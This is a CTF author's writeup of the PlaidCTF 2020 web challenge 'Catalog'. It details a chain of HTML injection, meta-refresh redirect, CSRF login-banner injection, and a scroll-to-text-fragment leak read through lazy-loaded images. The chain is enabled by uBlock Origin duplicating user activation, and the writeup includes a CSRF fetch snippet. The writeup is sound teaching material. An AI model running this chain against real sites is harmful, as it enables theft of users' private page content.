Down to the Wire

PlaidCTF 2020: Catalog Writeup

PlaidCTF 2020, with the theme Ready Pwner One, ran from April 17 to 19. We had a lot of very difficult problems, and all of them got solved… except for one:

Oops

At this point, it should probably come as little surprise that Catalog is one of mine; I don’t have the best record at having all of my problems solved (see: Toaster Wars Stormy Flag, idIoT: Lights). Here, I’ll discuss the intended solution to the problem, and a little behind-the-scenes look at what led me to write this problem and what I’d do differently if I had the chance to do it again.

The Problem

Story

Having thoroughly explored the anime section of the HQB Multimedia Library, you decide to venture on into the other sections. Next on your list is a section of comic books.

You’ve flipped through a few of the issues available, but they all seem like the standard fare. (Even if there’s some really rare stuff in here—not that you’d expect Action Comics No. 1 or Detective Comics No. 27 to be worth all that much in virtual form.) As you look around, one empty space on the shelf has catches your attention. There’s an open spot for a series called Plaid Comics, which also appears to only have a single issue. Interesting.

Fortunately, the library has a catalog website, so you can look up the missing volume! The site’s a bit strange; it seems like it’s something of a community effort, and allows you to add your own descriptions for issues if they’re missing. However, descriptions aren’t public until an admin approves, and while you were able to find the issue in question, it appears that the description isn’t public. But if an admin can see it, that’s just as good as if you could see it, right?

Problem Details

Here’s the site. The flag is on this page.

Browser: Chromium with uBlock Origin 1.26.0 installed and in its default configuration

Flag format: /^PCTF\{[A-Z0-9_]+\}$/

Hints:

  • To view your post, the admin will click on a link on the admin page.
  • You might want to read up on User Activation.
  • The intended solution does not require you to submit hundreds of captchas.
  • The admin bot will always disconnect after about 30 seconds.

The Catalog Website

The Catalog site itself is a pretty good place to start. It looks like a pretty standard CTF web XSS challenge site; you can create and view posts, and you don’t have the ability to view the post that contains the flag, but you can report your own posts to make the admin look at them.

A quick test on each of the fields of a post indicates that the image field is injectable, while the other two aren’t:

Now that's some great content!

That said, the CSP on this site pretty much stops anything you might do with this injection dead in its tracks:

CSP content_copy
Content-Security-Policy: default-src 'nonce-hSQhz0nU1+JZmQDbJLaJ43ww+iPBVX1/'; img-src *; font-src 'self' fonts.gstatic.com; frame-src https://www.google.com/recaptcha/

The only particularly notable omission here is the lack of a restriction on base-uri, but as we don’t have an injection into the <head>, it seems like this isn’t exploitable. (While we can set the base-uri somewhere offsite, it won’t apply to the loaded scripts and styles since it appears after those are loaded.) Additionally, all of the elements that have the nonce set are before our injection, so any theoretical attack that might involve getting that attribute associated with an element we insert doesn’t seem possible either.

However, there is one thing we can do despite the CSP: get the admin offsite by way of a <meta http-equiv="refresh" /> tag. CSP places no restriction on this tag, and it can appear anywhere in the document, so we can force admin somewhere offsite.

Playing with the other features of the site, we can see that some actions cause a banner to appear at the top of the page:

BAM!

The notable actions that trigger this are:

  • Logging in
  • Logging out
  • Missing username or password at login
  • Incorrect credentials at login
  • Creating a new post
  • Missing title or content at post creation

Of these, the only ones that contain content we control are the ones for login and incorrect credentials at login. We can’t do anything interesting with the successful login message, since the backend has some restrictions on valid usernames; however, the invalid credentials message is injectable!

Always hack with marquees.

An important part of how this feature works is that it can appear on any page. If you poke around with the login endpoint a bit, you’ll find out that the response is always a 302 back to the referring page. From this, we can infer that the banners to show are stored on the session.

Putting these two pieces together, we can at least get to the point of having an injection on the page that has the flag! All we have to do is use our post to redirect the admin to a page we control, use a no-cors request from there to CSRF a failed login attempt back to the main site, and then send them to the flag page! We can do that with something like this:

JavaScript content_copy attack.js
fetch("http://catalog.pwni.ng/user.php", {
	method: "POST",
	mode: "no-cors",
	credentials: "include",
	headers: {
		"content-type": "application/x-www-form-urlencoded"
	},
	body: `username=${encodeURIComponent("<marquee>Nice!</marquee>")}&password=fail&action=login`
}).then(() => {
	window.location = "http://catalog.pwni.ng/issue.php?id=3";
});

You can see the code that gets us to this point in the exploit here.

Exfiltrating without scripts and styles

So now we have an injection on the page with the flag, but how can we use that to read the flag? We can’t inject any scripts or styles, so it seems like we’ll have to somehow leak the content using only content.

A recently-released Chromium feature that came into some controversy is “scroll to text fragment” (which I’ll abbreviate STTF), a deep-linking mechanism that allows a link to refer to specific text on a page, which the browser will highlight and scroll to when the page loads. The security review document for the feature gives some very useful information about potential attack vectors. This should hopefully give us some ideas on how to proceed:

  • Anything timing-based seems unlikely to land, so we’d need to use a scroll-detection-based attack. As the document notes, this would require something like a cross-origin iframe that we could use to detect the scroll position offsite. (What could we inject to detect scroll position?)
  • STTF has some sort of relationship with User Activation, as the document notes that “the primary mitigation to [exfiltrating data via repeated requests] is to require a user gesture before activating the feature.” We’ll examine this more closely in the following sections.
  • Matches are forced to word boundaries to prevent letter-by-letter matches. (How can we bypass the fact that we can only match entire words?)
  • STTF is restricted to top-level browsing contexts (i.e., you can’t use STTF inside an iframe).

Let’s see if we can answer those two questions:

What could we inject to detect scroll position?

Due to the CSP, the only primitive we have for cross-origin communication is images, so we’ll have to use an image. Fortunately, recent versions of Chromium support lazy-loading images, which only get loaded when the user scrolls near them. So if we inject a bunch of whitespace followed by an <img loading="lazy" />, we can detect if the page scrolled to any content after the image!

How can we bypass the fact that we can only match entire words?

Perhaps a better question to start with would be “what qualifies as a word?”. Taking a look at the source for this feature, there’s a helpful comment that describes one facet of word-matching:

C++ content_copy text_fragment_finder.cc
// Determines whether the start and end positions of |range| are on word
// boundaries.
// TODO(crbug/924965): Determine how this should check node boundaries. This
// treats node boundaries as word boundaries, for example "o" is a whole word
// match in "f<i>o</i>o".

So we can match individual characters so long as they’re each in their own tag. However, there’s not much of a good reason why a website would want to do that… unless it wants to, say, implement some interesting typography.

POW!

The site implements this feature using lettering.js, a jquery plugin that splits an element into a <span> for each character. Conveniently, this happens to all <em> tags after the page loads, so all we need to do is inject an <em> tag that covers the content of the post, including the flag!

Crafting an attack, part 1

Let’s put together what we’ve learned so far. It seems like the following is almost a viable approach:

  1. Admin clicks on a link to our post
  2. Our post redirects the admin to the attack site by way of <meta http-equiv="refresh" />
  3. CSRF from the attack site to make a failed login attempt, which injects a bunch of whitespace followed by a lazy-loading image followed by an <em> tag
  4. We redirect the admin to the flag page with a text fragment, e.g. #:~:text={-,X to check if the first character of the flag is an X
  5. If we receive a request for the lazy-loading image, then the first character of the flag is X; otherwise, it is not

This is workable, except that we fail to meet the requirement that we have a user gesture on the page initiating the STTF request (here, the attack site). However, if we could somehow obtain or fake a user gesture on the attack site, we can see that this would work!

You can see the code that gets us to this point in the exploit here. Note above that the page scrolls and the lazy-loaded image loads because we “guessed” the first character of our fake flag correctly, as shown by the “N” being highlighted.

Now would probably be a good time to look into how exactly user gestures work in Chromium.

User Activation

One of the hints explicitly mentions the phrase “user activation”; a quick search should land you at this page, which describes the User Activation v2 API pushed fairly recently by Chrome. User Activation standardizes the behavior of other APIs that have traditionally required a “user gesture” of some kind, such as opening a popup or vibrating the user’s phone. This also explains the first hint: if the admin has to click on a link to navigate to our post initially, then that counts as an activation. That said, that activation shouldn’t carry over to pages loaded in the future, so that’s certainly not the entire reason we would need to look into this…

An interesting note about User Activation mentioned at the above page is that it can be passed between cross-origin frames via postMessage. In particular, the behavior of user activation follows this pattern:

  • When a user interacts with a frame, that frame and all of its ancestors in the frame tree are activated.
  • When an activated frame uses postMessage to communicate with an inactive frame with includeUserActivation set to true, the inactive frame becomes active.
  • When an API consumes the activation, all frames in the frame tree are deactivated.

(Note that I’m only refering to what that page calls the “transient bit” here, which is exposed as isActive in the API. The “sticky bit”, or hasBeenActive, is propagated through similar means but is never unset, and is ultimately not important for this problem.)

At first glance, this all seems pretty reasonable; a frame can only use an activation-gated API if it is interacted with or communicated to by an active frame, and every activation can only be consumed once since the entire frame tree gets deactivated.

Perhaps it’s time to look into the remaining piece of the problem that we haven’t considered yet.

uBlock Origin

Since Chrome extensions have several parts, it’s important to first have a basic understanding of what those parts are and what they can do. A pretty good explanation can be found on the overview page of the Chrome extensions documentation, which is best summarized by this diagram:

Anatomy of a Chrome extension

In short, an extension can have up to three pieces. All extensions have a background page, which is an execution context in which extensions can set listeners for the events they care about. This is also the part of the extension that gets access to the low-level chrome.* APIs, which give fine-grained control over some of Chrome’s inner workings that aren’t exposed to common JavaScript. Extensions may also have a popup window, which appears when you click on the icon and usually contains configuration options and access to extension-level actions. Finally, an extension may also inject a content script into every page that runs, which runs alongside any scripts that are loaded by the site being accessed. Content scripts are important as they are the only way to actually interact with the running page, for example by reading or manipulating the DOM.

As the diagram shows, in order for these pieces to communicate, they need to use some sort of message-passing mechanism. And that means using postMessage! If you look at uBlock Origin’s content script, you can see a handful of calls to vAPI.messaging.send, which is an abstraction on top of a postMessage call.

However, it seems like in the context of User Activation, this would be of limited use since the includeUserActivation flag isn’t set, right? As it turns out, the options argument doesn’t exist for the variant of postMessage used by content scripts to communicate with the background page; it will always include the user activation if it has one!

At this point, you might be wondering why this is important. Let’s consider: what happens when a user interaction occurs alongside an extension using postMessage for communication? Since the user interacts with the page, the foreground frame becomes active. If the content script were to post a message to the background frame for some reason, it would then become active as well since it received a message from an active frame. If the activation were then consumed in some way by the foreground frame, it would deactivate all of the frames in its frame tree – but this does not include the extension’s background frame! If the background frame then posted a message to the foreground frame, it would then get reactivated since it received a message from an active frame, thus duplicating the user activation!

This also provides a convenient method of moving a user activation between unrelated pages. Rather than consuming the activation, what happens if the main frame navigates? Obviously, it gets deactivated, but if the extension’s background page postMessages to it before the activation times out, then it will get reactivated on the new page!

This is a good idea, but how can we trigger it in practice? As it turns out, we don’t need to do anything, as all of the pieces are already a part of uBlock’s core behavior. In particular, if we look through the usages of vAPI.messaging.send, one use of it is to signal the background page that it’s ok to let through a popup resulting from a clicked link:

JavaScript content_copy contentscript.js
const onMouseClick = function(ev) {
	if ( ev.isTrusted === false ) { return; }
	vAPI.mouseClick.x = ev.clientX;
	vAPI.mouseClick.y = ev.clientY;

	// https://github.com/chrisaljoudi/uBlock/issues/1143
	//   Find a link under the mouse, to try to avoid confusing new tabs
	//   as nuisance popups.
	// https://github.com/uBlockOrigin/uBlock-issues/issues/777
	//   Mind that href may not be a string.
	const elem = ev.target.closest('a[href]');
	if ( elem === null || typeof elem.href !== 'string' ) { return; }
	vAPI.messaging.send('contentscript', {
		what: 'maybeGoodPopup',
		url: elem.href || '',
	});
};

Further, on loading a new page, the content script will always open a communication with the background frame, receive a message from it, and send a message to it. This means that if we click on a link with uBlock on, the following will happen:

User Activation gone wrong

So, in theory, the simple act of clicking on a link with uBlock Origin enabled moves the activation to the new page. We can validate this pretty easily by creating a custom build of uBlock that adds some logging:

You can see the code for this POC here.

Crafting an attack, part 2

Using our knowledge of User Activation, we now end up with the following:

  1. Admin clicks on a link to our post (given in hint 1), activating the foreground frame
    • The foreground frame posts to uBlock’s background frame, activating it
    • The foreground frame navigates to our post and is deactivated
    • uBlock sends a message back and forth on page load, so the foreground frame is activated
  2. The <meta http-equiv="refresh" /> in our post kicks in, navigating the foreground frame to an attacker-controlled site
    • uBlock sends a message back and forth on page load, so the foreground frame is activated
  3. We CSRF from the attacker-controlled site to make a failed login attempt on the Catalog site, injecting with whitespace, a lazy-loading image, and an <em> tag
  4. We redirect from the attacker-controlled site to the page with the flag, including a text fragment that searches for the next character of the flag (which is honored since our current frame is activated)
  5. We either receive a request for the lazy-loaded image (indicating our guess was correct) or we do not (indicating our guess was incorrect)

However, with the given flag alphabet, this would take up to 38 guesses per character, or 1140 submissions for an entire 30-character flag. This is cleraly infeasible. However, we can make some improvements.

First, we can put multiple STTF directives in a single URL, so we can put in the fragments for half of the alphabet to leak a full bit of information at a time. This will take us at most 6 guesses per character, or a total of 180 submissions for a 30-character flag, which is much closer but still infeasible.

Second, there’s nothing stopping us from doing multiple round-trips in a single submission! In particular, if we’re faster than the user activation timeout (which appears to be 5 seconds), then the background frame is still activated, so we can use another <meta http=equiv="refresh" /> to get back to our own site and make another guess! This approach will net about 30 round-trips per submission, which means that we’ll need to submit roughly 6 captchas, which should be totally fine.

One last point to note: the particular way in which we specify our text fragment is very important. Since we’ll scroll to the first point on the page that matches our fragment, we need to minimize the chance that we’ll falsely identify another string on the page as part of the flag. The best way I could think of to do this is to use a fragment like #:~:text=A-,B,-C if the last two characters that we know about are AB and we want to check if the next character is C, which would force ABC to appear in order to detect the next character, with an error occurring only if AB appears somewhere else on the page.

Here’s what this attack looks like in action!

The full exploit can be found here.

Inspiration

One day at work, I was looking into whether or not a certain feature of our site supported an unreasonably old version of Chrome that a hardware supplier was installing on their devices. I don’t remember what feature I was looking for exactly, or what version of Chrome I was trying to target, but I do remember absentmindedly scrolling through the Wikipedia article on Chrome’s version history when I came across an interesting entry under Chrome 80:

You what now?

This immediately caught my interest, and after looking into the feature a bit deeper, I just knew I had to write a client-focused web problem that used it.

Over the next few weeks I fleshed out the problem a bit more. I looked into how STTF matched words, and realized that weird typography could be a way to allow STTF to match individual characters. I looked into methods of exfiltrating and came upon the idea of using lazy-loading images.

It was all going great until a couple of days before Plaid, when I went to set up the admin bot and found that my exploit didn’t work.

All of my testing up to that point had been in the browser I use day-to-day, so naturally I had a bunch of extensions enabled. After a long debugging session of flipping every flag I could think of and eventually enabling extensions one at a time in my main browser, I realized that uBlock was doing something weird that was allowing me to trigger STTF when I shouldn’t be able to due to user activation.

A couple hours later, I finally figured out what was going on, and I ultimately decided that it was neat enough that I wanted to include it in the problem as well. Since this adds quite a bit of difficulty to the problem, I decided to add in the hints to hopefully push competitors in the right direction.

Execution

I was kind of worried when 24 hours passed and nobody had solved the problem yet, and I hadn’t seen any signs that anyone was making significant progress. I decided to take a poll of all of the teams to see where everyone was, because for fairness reasons any hint I gave would need to be something that nobody had figured out yet.

To my surprise, it turned out that herrera of ELT basically had the entire exploit figured out! Based on his response to me, the only hint I could reasonably give at this point would have been something like “the flag is not in <em> tags on the flag page,” but that seemed far too targeted so I ultimately opted not to release a hint.

Unfortunately, herrera wasn’t ultimately able to leak the entire flag in time, though he had the entirety of the part of it that was readable text. He just had a few hex characters to go and he would’ve gotten the entire flag!

Now that it’s over, I guess a reasonable question would be: what would I do differently if I were to run this problem again? I think that perhaps simply mentioning User Activation wasn’t a strong enough hint in any particular direction. My assumption had been that competitors would probably look into that first, which would give them guidance in how to approach uBlock and indicate to them that they’re looking in the right places when they see that STTF requires a user gesture. Based on the feedback I received, however, it seems like this was probably not the case.

I think it may have made for a better challenge if I pointed out the specific link-clicking code in uBlock and said “something is weird with this,” and let the competitors take it from there. uBlock is a pretty large surface, after all, so some added direction there probably would have been a reasonable move.

Oh well. It seemed like people generally enjoyed the challenge nonetheless. Here’s hoping all of my challenges get solved next year, so at least my record can be 2-3!